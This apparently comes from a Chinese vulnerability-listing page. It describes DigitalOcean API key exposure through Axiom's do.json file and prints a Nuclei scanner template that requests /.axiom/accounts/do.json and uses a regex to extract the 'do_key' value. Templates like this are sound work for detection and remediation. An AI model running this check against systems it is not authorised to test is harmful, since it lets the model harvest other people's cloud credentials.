axiom-digitalocean-key-exposure: DigitalOcean Key Exposure via Axiom

日期: 2025-08-01 | 影响软件: DigitalOcean | POC: 已公开

漏洞描述

Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments.

PoC代码[已公开]

id: axiom-digitalocean-key-exposure

info:
  name: DigitalOcean Key Exposure via Axiom
  author: geeknik
  severity: critical
  description: Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments.
  remediation: Restrict access to the do.json file or upgrade to a newer version of Axiom
  reference:
    - https://github.com/pry0cc/axiom
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-425
  metadata:
    max-request: 1
  tags: axiom,digitalocean,key,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/.axiom/accounts/do.json"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"do_key"'
          - '"region"'
          - '"provider"'
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - '\"do_key\"\: .*'
# digest: 4a0a0047304502204a8daaf6ecff574d7ac019497a0a4801bd0870b900cadff85a96956969501d980221008da954ca4743dedaf51dd3a544b2454470bd3018b5310082683510816da90155:922c64590222798bb761d5b6d8e72950

相关漏洞推荐